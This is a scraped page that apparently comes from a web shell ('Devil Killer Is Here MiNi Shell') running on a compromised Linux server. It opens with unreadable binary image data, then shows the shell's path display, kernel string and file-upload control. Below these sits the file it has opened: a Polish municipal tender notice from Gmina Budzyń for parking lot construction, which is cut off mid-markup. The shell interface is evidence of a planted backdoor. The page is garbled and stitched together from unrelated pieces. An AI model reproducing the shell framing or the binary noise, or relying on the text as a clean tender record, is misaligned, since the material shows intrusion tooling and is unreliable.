JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240828/0047563601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa i przebudowa parkingów na terenie Gminy Budzyń </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BUDZYŃ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791017</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Przemysłowa 16 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Budzyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-840</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL411 - Pilski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">67 2843201; 2843313;</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">67 2843 370</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@budzyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.budzyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa i przebudowa parkingów na terenie Gminy Budzyń </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c1f16c67-cf75-4381-bf53-ee7b1822d7b5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00475636</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-08-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025032/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budowa parkingu w m. Wyszyny</p> <p class="mb-0">1.1.12 Przebudowa parkingu wewnętrznego przy DDPS w Budzyniu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c1f16c67-cf75-4381-bf53-ee7b1822d7b5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Wszelki informacje znajdują się w rozdziale I i II SWZ oraz na<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wszelki informacje znajdują się w<br/>rozdziale I i II SWZ oraz na https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszelkie informacje znajdują się w rozdziale XXIII oraz XXIV SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wszelkie informacje znajdują się w rozdziale XXIII oraz XXIV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKM.272.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót dla części Nr 1 <br/>Budowa parkingu w m. Wyszyny<br/>Przedmiotem zamówienia jest wykonanie robót budowlanych branży drogowej polegających na budowie parkingu w miejscowości Wyszyny na terenie działki o numerze ewidencyjnym 166/20 obręb ewidencyjny Wyszyny, wykorzystywanego do postoju samochodów osobowych i innych pojazdów o ciężarze do 2,5t.<br/>Ogólny zakres prac obejmuje:<br/>- wybudowanie parkingu o nawierzchni z betonowych prefabrykatów <br/>- budowę chodników jako dojść do miejsc postojowych<br/>- oznakowanie i urządzenia BRD zgodnie z projektem organizacji ruchu<br/><br/>Zestawienie powierzchni<br/>- jezdnia manewrowa 793,82 m2,<br/>- miejsca postojowe 941,50 m2,<br/>- chodnik 10,00 m2,<br/>- zjazdy 71,57 m2,<br/>- zieleń 483,80 m<br/><br/>Charakterystyczne parametry<br/>Dane wyjściowe:<br/>- kategoria ruchu KR1<br/>- wymiary stanowiska dla pojazdów osobowych: 5,00 x 2,50 m,<br/>- wymiary stan. dla pojazdów osób niepełnosprawnych: 5,00 x 3,60 m,<br/>- spadek poprzeczny i podłużny ≤ 2,5%,<br/>- szerokość jezdni manewrowej – 5,00 m.<br/>- pobocza wokół parkingu o szerokości 1,00 - 3,40 m o nawierzchni gruntowej z humusowaniem i obsianiem trawą.<br/><br/>Konstrukcje nawierzchni:<br/>parking<br/>· 20 cm – podbudowa zasadnicza – mieszanka kruszyw niezwiązanych<br/>C90/3,<br/>· 3 cm – podsypka piaskowa,<br/>· 8 cm – warstwa ścieralna – betonowa kostka brukowa typu „behaton”, wibroprasowana I gat., kl. I lub betonowa płyta ażurowa,<br/>jezdnia manewrowa<br/>· 20 cm – podbudowa zasadnicza – mieszanka kruszyw niezwiązanych<br/>C90/3,<br/>· 3 cm – podsypka piaskowa,<br/>· 8 cm – warstwa ścieralna – betonowa kostka brukowa typu „behaton”, wibroprasowana I gat., kl. I,<br/>parking z kostki rozbiorkowej<br/>· 20 cm – podbudowa zasadnicza – mieszanka kruszyw niezwiązanych C90/3,<br/>· 5 cm – podsypka piaskowa,<br/>· 6 cm – warstwa ścieralna – betonowa kostka brukowa typu „behaton”,<br/>zjazd<br/>· 20 cm – podbudowa zasadnicza – mieszanka kruszyw niezwiązanych C90/3,<br/>· 3 cm – podsypka piaskowa,<br/>· 8 cm – warstwa ścieralna – betonowa kostka brukowa typu „behaton”, rozbiórkowa,<br/>chodnik<br/>· 10 cm – podbudowa zasadnicza – mieszanka kruszyw niezwiązanych<br/>C90/3,<br/>· 3 cm – podsypka piaskowa,<br/>· 6 cm – warstwa ścieralna – betonowa kostka brukowa typu „behaton”, rozbiórkowa,<br/><br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia dla poszczególnych części zawiera dokumentacja projektowa, w skład której wchodzą:<br/>- projekt zagospodarowania terenu,<br/>- projekt budowlany (branża drogowa,)<br/>- projekt stałej organizacji ruchu,<br/>- projekt techniczny (branża drogowa)<br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót budowlanych ( dalej STWiORB).<br/>- przedmiar robót (kosztorys ofertowy), <br/>Dokumentacja projektowa dostępna jest na stronie internetowej prowadzonego postępowania pod adresem : https://ezamowienia.gov.pl<br/>Powyższe dokumenty stanowią załącznik nr 9 do niniejszej SWZ.<br/>Uwaga:<br/>Załączone przedmiary robót(kosztorysy ofertowe) stanowią zakresy prac objętych niniejszym postępowaniem i służą wykonawcom jako pomoc w oszacowaniu kosztów inwestycji </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233330-1 - Fundamentowanie ulic</p> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45262640-9 - Roboty w zakresie poprawy stanu środowiska naturalnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszelkie informacje znajdują się w rozdziale XV SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na wykonane roboty i zamontowane urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót dla części Nr 2<br/>Przebudowa parkingu wewnętrznego przy DDPS w Budzyniu<br/>Przedmiotem zamówienia jest wykonanie przebudowy parkingu wewnętrznego przy Dziennym Domu Pomocy Społecznej w Budzyniu na części działki o numerze ewidencyjnym 741/1, obręb Budzyń. Ogólny zakres robót polegać będzie na umocnieniu obecnej nawierzchni gruntowej parkingu prefabrykowaną kostką betonową.<br/><br/>Ogólny zakres robót i przekrój konstrukcyjny na parkingu<br/>Projektuje się wykonanie 7 miejsc postojowych dla samochodów osobowych, w tym 6 miejsc postojowych zwykłych o szerokości od 2,5 do 2,75 m i 1 miejsca postojowego dla osoby niepełnosprawnej o szerokości 3,6 m. Dwa stanowiska postojowe będą o długości 5,5 m z możliwością równoległego parkowania oraz pięć stanowisk postojowych z możliwością prostopadłego parkowania. Nie projektuje się zmian w przebiegu parkingu w jego w planie i przekroju podłużnym.<br/>Zaprojektowano n/w przekrój konstrukcyjny nawierzchni parkingu:<br/>- warstwa mrozoochronna z piasku wg. normy PN-B-11113, grub. 15 cm,<br/>- podbudowa zasadnicza o grub. 20 cm – mieszanka kruszyw niezwiązanych C50/30,<br/>-podsypka cementowo - piaskowa 1:4, o grub. 3 cm,<br/>- warstwa ścieralna z kostki betonowej o grub. 8 cm, fazowanej, typ „Behaton” o zabarwieniu grafitowym, klasa I, gat. I.<br/>Odwodnienie pasa drogowego odbywać się będzie powierzchniowo w kierunku do istniejących wpustów kanalizacji deszczowej.<br/>Niweletę parkingu pozostawiono bez zmian i jest ona dostosowano do niwelety przyległego chodnika.<br/>Nawierzchnię miejsca postojowego na parkingu dla osoby niepełnosprawnej wykonać z kostki betonowej o grub. 8 cm, bezfazowej, typ „Behaton” o zabarwieniu szarym, gdzie następnie całe to stanowisko musi zostać zabarwione tłem w kolorze niebieskim wykonane farbą chemoutwardzalną.<br/>Powierzchnia parkingu dla stanowisk zwykłych wynosi 106,7 m2.<br/>Powierzchnia parkingu dla stanowiska osoby niepełnosprawnej wynosi 19,1 m2.<br/>Spoiny uzupełnić odsianym piaskiem poprzez jego wmulenie między kostki wodą.<br/>Całość parkingu po jego obwodzie, będzie obramowana betonowym krawężnikiem ulicznym 15*30 cm, wystającym 10 cm, ułożonym na ławie betonowej.<br/>Nawierzchnia parkingu od strony drogi manewrowej będzie nawiązaniem do nawierzchni tej drogi (bez oporników).<br/>Spadek poprzeczny i podłużny parkingu – od 0,5 do 2 %.<br/><br/>Przekrój konstrukcyjny na drodze manewrowej<br/>Projektuje się wykonanie umocnienia drogi manewrowej o szerokości od 2,2 do 5,5 m.<br/>Przebieg drogi manewrowej w planie oraz w przekroju podłużnym nie ulegnie zmianie.<br/>Zaprojektowano n/w przekrój konstrukcyjny nawierzchni drogi manewrowej:<br/>- warstwa mrozoochronna z piasku wg. normy PN-B-11113, grub. 15 cm,<br/>- podbudowa zasadnicza o grub. 20 cm – mieszanka kruszyw niezwiązanych C50/30,<br/>- podsypka piaskowa o grub. 3 cm,<br/>- warstwa ścieralna z kostki betonowej ekologicznej o grub. 8 cm, kształtem nawiązująca do kostki typ „Behaton” o zabarwieniu szarym, klasa I, gat. I.<br/>Nawierzchnia drogi manewrowej musi łączyć zalety kostki typu „Behaton” z ideą proekologiczną. Kostka ta musi mieć „wybrania” (puste przestrzenie) przez które wody opadowe będą przenikać do gruntu.<br/>Powierzchnia drogi manewrowej do ułożenia wynosi 296,0 m2.<br/>W cenie ułożenia kostki uwzględnić należy wypełnienie pustych przestrzeni piaskiem poprzez jego wmulenie między kostki wodą.<br/>Całość drogi manewrowej po jej obwodzie, będzie obramowana betonowym krawężnikiem ulicznym 15*30 cm, wystającym 10 cm, ułożonym na ławie betonowej lub betonowym obrzeżem wysokim 8*30 cm, całkowicie wtopionym, ułożonym na ławie betonowej.<br/>Nawierzchnia drogi manewrowej od strony parkingu będzie nawiązaniem do nawierzchni tego parkingu (bez oporników).<br/>Spadek poprzeczny i podłużny drogi manewrowej – od 0,5 do 2 %.<br/><br/>Przekroje konstrukcyjne na chodniku<br/>W celu kolorystycznego wyodrębnienia dojścia do przyległego śmietnika i do budynku GOPS, zaprojektowano wykonanie umocnienia chodników w sposób, który pozwoli również poprowadzić na nich ruch samochodowy.<br/>Konstrukcja chodników przedstawia się następująco:<br/>- warstwa mrozoochronna z piasku wg. normy PN-B-11113, grub. 15 cm,<br/>- podbudowa zasadnicza o grub. 20 cm – mieszanka kruszyw niezwiązanych C50/30,<br/>- podsypka cementowo - piaskowa 1:4, o grub. 3 cm,<br/>- warstwa ścieralna z kostki betonowej o grub. 8 cm, fazowanej, typ „Behaton” o zabarwieniu czerwonym, klasa I, gat. I.<br/>Spoiny uzupełnić odsianym piaskiem poprzez jego wmulenie między kostkami wodą.<br/>Obmiar powierzchni chodników do wykonania wynosi - 80,0 m2.<br/>Połączenie nawierzchni chodników musi być nawiązane do niwelety zaprojektowanej drogi manewrowej lub parkingu (połączenie bez obrzeża).<br/>Spadek poprzeczny i podłużny chodników – od 0,5 do 2 %.<br/><br/>Ława betonowa, krawężniki, oporniki<br/>W ramach opracowania niniejszego projektu przewiduje się wykonanie następujących ław z betonu klasy C16/20:<br/>- ława betonowa zwykła dla krawężników częściowo zatopionych na zjazdach do posesji i parking w ilości 0,05 m3/mb,<br/>- ława betonowa z oporem dla krawężników pozostałych w ilości od 0,06 do 07 mm3/mb w zależności od usytuowania krawężnika względem nawierzchni,<br/>- ława betonowa z oporem dla obrzeża wysokiego całkowicie zatopionego ustawionego po zewnętrznej stronie drogi manewrowej w ilości 0,05 m3/mb,<br/>Krawężniki uliczne z betonu wibroprasowanego o wymiarach 15 x 30 cm, ułożone jako wystające po zewnętrznym obrysie parkingu lub drogi manewrowej.<br/>Krawężniki te muszą być ułożony na ławie betonowej jw.<br/>Krawężniki muszą wystawać max 10 nad krawędź nawierzchni parkingu.<br/>Obmiar krawężników zwykłych do ułożenia wynosi 66,7 mb.<br/>Obrzeże betonowe wysokie z betonu wibroprasowanego o wymiarach 8 x 30 cm, całkowicie wtopione, ułożone będzie na ławie betonowej jw. po zewnętrznej stronie drogi manewrowej.<br/>Obmiar obrzeży do ułożenia wynosi 48,0 mb.<br/><br/>Zieleń<br/>Po wykonaniu robót należy wykonać pielęgnację przyległych zieleńców wraz z miejscową ich odbudową i plantowaniem oraz z humusowaniem i obsianiem trawą w miejscach ich zniszczenia. Odbudowa zieleńców powinna uwzględnić ich powiązanie wysokościowe do elementów sąsiadujących (krawężników i obrzeży). Po rozplantowaniu humusu należy te tereny obsiać dodatkowo trawą. Minimalna grubość humusowania - 5 cm. <br/>Obmiar powierzchni zieleńców do wykonania wynosi 116,5 m2.<br/><br/>Oznakowanie poziome i pionowe<br/>Poszczególne miejsca postojowe na parkingu, w celu kolorystycznego ich wyodrębnienia, należy oznaczyć pojedynczym rzędem kostek w kolorze szarym, które będą zastępować znak poziomy P-18.Tło nawierzchni miejsca postojowego dla osoby niepełnosprawnej należy wykonać w kolorze niebieskim poprzez naniesienie na nim oznakowania grubowarstwowego. Na tym tle należy odpowiednio umieścić znak poziomy P-24.<br/>Łączna powierzchnia oznakowania poziomego do oznakowania wynosi 19,9 m2.<br/>Dodatkowo miejsce postojowe dla osoby niepełnosprawnej, należy dodatkowo oznakować jednym kmp. znaków pionowych D-18a z tabliczką T-29.<br/>Oznakowanie poziome umieszczone na nawierzchni może być wykonanie z:<br/>- materiałów chemoutwardzalnych do znakowania cienkowarstwowych tj farby nakładanych warstwą grubości od 0,3 mm do 0,8 mm,<br/>- materiałów do znakowania grubowarstwowego tj. materiałów nakładanych warstwą grubości od 0,9 mm do 5 mm, należą do nich chemoutwardzalne masy stosowane na zimno oraz masy termoplastyczne,<br/>Zastosowane znaki pionowe muszą mieć lico wykonane z folii odblaskowej min. I generacji lub wyższej. Znaki umieścić w odległości 0,5 m od krawędzi parkingu, na wysokości 2,2 metra do dolnej krawędzi znaku. Tarcze znaków wykonane muszą być z blachy ocynkowanej grubości min. 1,5 mm, z podwójnie zagiętą krawędzią na całym obwodzie, z profilami usztywniająco – mocującymi.<br/>Wielkość znaków - grupa znaków średnie (S).<br/>Stosowane słupki do znaków wykonać z rur stalowych o Ø od 60 mm do 70 mm.<br/>Znaki na tych słupkach montowane muszą być w sposób zapewniających ich stabilność.<br/>Stosowane znaki pionowe powinny być dobrze widoczne zarówno w dzień jak i w nocy.<br/><br/>Roboty rozbiórkowe<br/>Podczas remontu parkingu przewiduje się rozbiórkę n/w elementów:<br/>- istniejących betonowych krawężników ulicznych po obwiedni rosnących drzew w ilości 27,0 mb,<br/>- umocnienia wykonanego płytą betonową o grub. 25,0 cm, na wjeździe z ul. Kościelnej o powierzchni 11,0 m2, celem ułożenia w tym miejscu nowej nawierzchni chodnika.<br/><br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia dla poszczególnych części zawiera dokumentacja projektowa, w skład której wchodzą:<br/>- projekt zagospodarowania terenu,<br/>- projekt techniczny zgłoszenia robót budowlanych (branża drogowa,)<br/>- przedmiar robót (kosztorys ofertowy), <br/>Dokumentacja projektowa dostępna jest na stronie internetowej prowadzonego postępowania pod adresem : https://ezamowienia.gov.pl<br/>Powyższe dokumenty stanowią załącznik nr 9 do niniejszej SWZ.<br/>Uwaga:<br/>Załączone przedmiary robót(kosztorysy ofertowe) stanowią zakresy prac objętych niniejszym postępowaniem i służą wykonawcom jako pomoc w oszacowaniu kosztów inwestycji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233330-1 - Fundamentowanie ulic</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45262640-9 - Roboty w zakresie poprawy stanu środowiska naturalnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 